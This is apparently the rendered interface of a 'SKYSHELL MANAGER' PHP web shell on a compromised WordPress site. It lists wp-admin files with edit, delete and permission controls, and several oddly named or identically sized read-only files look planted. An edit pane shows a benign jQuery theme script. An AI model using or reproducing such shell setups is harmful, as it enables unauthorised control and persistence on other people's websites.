📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: script.js
(function($) { "use strict"; // Back to top $.scrollUp({ scrollText: '<i class="fa fa-long-arrow-up"></i>', easingType: 'linear', scrollSpeed: 900, animation: 'fade' }); // Menu sticky $(window).on('scroll',function() { var scroll = $(window).scrollTop(); if (scroll < 20) { $(".header-area").removeClass("sticky-header"); }else{ $(".header-area").addClass("sticky-header"); } }); //js code for mobile menu toggle $(".menu-toggle").on("click", function() { $(this).toggleClass("is-active"); }); //portfolio filtering var $portfolio = $('.portfolio'); if ($.fn.imagesLoaded && $portfolio.length > 0) { imagesLoaded($portfolio, function () { $portfolio.isotope({ itemSelector: '.portfolio-item', filter: '*' }); $(window).trigger("resize"); }); } $('.portfolio-filter').on('click', 'a', function (e) { e.preventDefault(); $(this).parent().addClass('active').siblings().removeClass('active'); var filterValue = $(this).attr('data-filter'); $portfolio.isotope({filter: filterValue}); }); // Portfolio popup $(".portfolio-gallery").each(function () { $(this).find(".popup-gallery").magnificPopup({ type: "image", gallery: { enabled: true } }); }); $('.video-popup').magnificPopup({ type: 'iframe', }); // Hero Slider $('.hero-area-1').owlCarousel({ loop:true, dots: true, autoplay: false, mouseDrag: true, animateOut: 'fadeOut', animateIn: 'fadeIn', autoplayTimeout: 10000, smartSpeed: 1000, responsive:{ 0:{ items:1, nav:false, }, 576:{ items:1 }, 1000:{ items:1 } } }); // Hero Slider $('.hero-caro').owlCarousel({ loop:true, dots: false, nav: true, autoplay: true, mouseDrag: true, animateOut: 'fadeOut', animateIn: 'fadeIn', autoplayTimeout: 10000, smartSpeed: 1000, navText: [ '<i class="fa fa-angle-left"></i>', '<i class="fa fa-angle-right"></i>' ], responsive:{ 0:{ items:1, }, 576:{ items:1 }, 1000:{ items:1 } } }); // Date Picker $( function() { $( "#datepicker" ).datepicker(); }); //Counter-JS $('.count').counterUp({ delay: 10, time: 2000 }); // Preloader Js $(window).on('load', function(){ $('.preloader').fadeOut(1000); // set duration in brackets }); // Wow js active // new WOW().init(); // Full Screen Search $(".search-btn").on('click', function(){ $(".search-full").removeClass("close"); $(".search-full").addClass("open"); }) $(".search-close").on('click', function(){ $(".search-full").removeClass("open"); $(".search-full").addClass("close"); }) // Right Sticky Wapper if($(".right-sticky-wapper").length){ $("a.right-sticky-trigger").on("click",function(e){ $(this).parent(".right-sticky-wapper").toggleClass("active"); return false; }); } // packages Slider $('.packages').owlCarousel({ loop:true, dots: false, autoplay: false, margin: 30, animateOut: 'fadeOut', animateIn: 'fadeIn', autoplayTimeout: 5000, smartSpeed: 500, nav:true, navText: [ '<i class="flaticon-arrow"></i>', '<i class="flaticon-arrow-1"></i>' ], responsive:{ 0:{ items:1, }, 767:{ items:2 }, 1024:{ items:3 }, 1200:{ items:3 } } }); // Review Slider $('.reviews').owlCarousel({ loop:true, dots: true, autoplay: true, autoplayTimeout: 5000, smartSpeed: 1000, margin: 30, nav:false, responsive:{ 0:{ items:1, }, 576:{ items:1 }, 1000:{ items:2 }, 1024:{ items:2 }, 1200:{ items:2 } } }); // Testimonial Slider $('.testimonials').owlCarousel({ loop:true, dots: false, autoplay: true, autoplayTimeout: 5000, smartSpeed: 1000, nav:true, navText: [ '<i class="fa fa-angle-left"></i>', '<i class="fa fa-angle-right"></i>' ], responsive:{ 0:{ items:1, }, 576:{ items:1 }, 1000:{ items:1 }, 1024:{ items:1 } } }); // Testimonial Slider $('.buyer-review').owlCarousel({ loop:true, dots: false, autoplay: true, autoplayTimeout: 5000, smartSpeed: 1000, nav:false, responsive:{ 0:{ items:1, }, 576:{ items:1 }, 1000:{ items:1 }, 1024:{ items:1 } } }); // Brands Slider $('.brands').owlCarousel({ loop:true, dots: false, autoplay: true, margin: 30, nav:false, responsive:{ 0:{ items:1, }, 576:{ items:3 }, 1000:{ items:5 } } }); // service-carousel Slider $('.service-carousel').owlCarousel({ loop:true, dots: false, autoplay: false, margin: 30, nav:true, navText: ["<i class='fa fa-angle-left'>", "<i class='fa fa-angle-right'>"], responsive:{ 0:{ items:1, }, 576:{ items:2 }, 1000:{ items:3 } } }); //Faq area Accordion $('.accordion > li:eq(0) a').addClass('active').next().slideDown(); $('.accordion a').on( 'click',function(j) { var dropDown = $(this).closest('li').find('p'); $(this).closest('.accordion').find('p').not(dropDown).slideUp(); if ($(this).hasClass('active')) { $(this).removeClass('active'); } else { $(this).closest('.accordion').find('a.active').removeClass('active'); $(this).addClass('active'); } dropDown.stop(false, true).slideToggle(); j.preventDefault(); }); })(jQuery);
Save